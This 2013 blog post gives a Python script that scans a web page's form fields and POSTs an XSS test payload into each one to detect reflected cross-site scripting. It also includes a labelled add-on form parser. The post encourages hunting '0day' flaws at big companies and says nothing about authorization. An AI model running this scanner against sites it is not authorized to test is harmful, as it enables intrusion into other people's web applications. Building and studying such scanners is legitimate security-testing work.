Wednesday, 20 March 2013

[EN] Modules in your own webscanner - XSS over POST

This is another example of how Python can be used to build a (maybe simple, but) useful
web-app scanner. This part (called a 'module') can be used to figure out where in the tested page
there may be an XSS vulnerability (via HTTP POST).

It could be a good exercise to connect all of those 'modules' into 'one code'
that tests all the vulnerabilities.

To start, create a file named try_POST_xss.py. (Like before, we will need chmod u+x for this file.)
The source code is below:

#!/usr/bin/env python3
# ----
# try_POST_xss.py
# ----
# first we will GET argv[1]/page.argv[2] to read it
# and find out what names/inputs/submits/etc... there are.
# next we will POST those param-names separately with 'payload'.

# enjoy.

import http.client
import re
import sys
import urllib.parse
import urllib.request

# the usage check has to come before sys.argv[1] is read, or the script dies with IndexError
if len(sys.argv) < 3:
    sys.stderr.write('usage: ' + sys.argv[0] + ' localhost /path/2file.php\n')
    sys.exit(1)

host = sys.argv[1]
path_file = sys.argv[2]
url = host + ':80'

url_file = url + path_file

marker = '2222'                  # the string we search for in every response
payload = 'your<xss<code<here'   # for example script+alert(2222) - see below ;)
                                 # the payload must contain 'marker', otherwise nothing is ever reported
# if you want I have version 'payloads-from-file' too.

print('Target: ', host)
print('Vuln file: ', path_file)
print('Full URL to attack:', url_file)
print()

# first we must GET page, to read whole text to find
# if there is any of our 'vulnerable' ('to find') string.
get_connect = urllib.request.urlopen('http://' + url_file)
get_response = get_connect.read().decode('utf-8', 'replace')
status = get_connect.getcode()

print('Status of requested page: ', status)

# what we're looking for:
#results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
results = re.findall(' name="([^"]+)"', get_response)

#############################################################
# hm ;] one idea to test right now. ;D
poc = open('poc_file_for_POST_xss.html', 'w')

#############################################################

# func to send POST with the given parameter name to target url
def do_post_now(url, name):
    params = urllib.parse.urlencode({name: payload})
    headers = {'Content-type': 'application/x-www-form-urlencoded', 'Accept': 'text/plain'}
    connect = http.client.HTTPConnection(url)
    connect.request('POST', path_file, params, headers)
    response = connect.getresponse()
    print(response.status, response.reason)  # 200 OK?
    data = response.read().decode('utf-8', 'replace')
    connect.close()  # end of test this parameter at this URL
    offset = data.find(marker)   # character offset of the hit, -1 if absent
    if offset != -1:
        # count the newlines before the hit to turn the offset into a line number
        line_no = data.count('\n', 0, offset) + 1
        print('\t[+- (  POST XSS alert!  ) -+]')
        print('\t [+] Found POST XSS in line:', line_no)
        print(data.splitlines()[line_no - 1])   # the line that reflects the marker
        poc.write(data)  # write simple p0c file. ;7
        # do not close 'poc' here: the next parameter would write to a closed file and error out.
# end of do_post_now(url, name)
# ---

# MAIN:
# if result found:
if len(results) > 0:
    print('-------------------------------------------------------------')
    print('Got some results :) Now we can try to exploit parameters.\n')

    for name in results:
        print('Found param called: ', name)
        print('Do POST now, for URL: ', url, ' with param: ', name)
        # here we'll create a POST for found parameter
        do_post_now(url, name)
        # end of this POST for this parameter
    # end of loop over found parameters

poc.close()  # save the p0c file once, after every parameter has been tested

# EOF.
# ----
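The ' name="..."' regex in the script only catches double-quoted names and cannot tell which form a field belongs to or whether that form submits via GET or POST, so GET-only fields get POSTed and duplicate names get tested twice. As an added example (Python 3, not code from the original post), here is a form-field extractor built on the standard library's html.parser that returns the field names per POST form and also handles textarea/select/button and single-quoted attributes, which the commented-out regex attempted; the sample page and its field names are constructed.

```python
import html.parser

class FormFieldParser(html.parser.HTMLParser):
    """Collect every <form> with its action, method and the names of its fields
    (input/textarea/select/button, either quote style, duplicates collapsed)."""
    FIELD_TAGS = ('input', 'textarea', 'select', 'button')

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per <form>: action, method, fields
        self.orphans = []      # named fields that sit outside any <form>
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)        # html.parser already strips the quotes for us
        if tag == 'form':
            self._current = {'action': a.get('action', ''),
                             'method': (a.get('method') or 'get').lower(),
                             'fields': []}
            self.forms.append(self._current)
        elif tag in self.FIELD_TAGS and a.get('name'):
            bucket = self._current['fields'] if self._current else self.orphans
            if a['name'] not in bucket:   # the same name twice is one parameter
                bucket.append(a['name'])

    def handle_endtag(self, tag):
        if tag == 'form':
            self._current = None

def post_targets(page_html):
    """Return [(action, [field names])] for every form that submits via POST."""
    p = FormFieldParser()
    p.feed(page_html)
    p.close()
    return [(f['action'], f['fields']) for f in p.forms if f['method'] == 'post']

# constructed sample page: a POST form with mixed quoting and a duplicate name,
# a GET form, and one stray input outside any form
SAMPLE_PAGE = """<form action="/comment.php" method="POST">
  <input type='text' name='author'> <textarea name="body"></textarea>
  <select name="rating"><option>1</option></select>
  <input type="hidden" name="author" value="dup">
  <input type="submit" name="send" value="Send">
</form>
<form action="/search.php"><input name="q"></form>
<input name="csrf_token" value="x">"""

if __name__ == '__main__':
    print(post_targets(SAMPLE_PAGE))  # [('/comment.php', ['author', 'body', 'rating', 'send'])]
```

Feeding get_response from the script into post_targets gives the (action, fields) pairs to hand to do_post_now, instead of every name="..." on the page.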

The interesting thing here is that you will find 0day vulnerabilities at big companies.
Trust me. ;)

And - as always - feedback is welcome.

(* You will also find the full code here.)
Enjoy! ;)
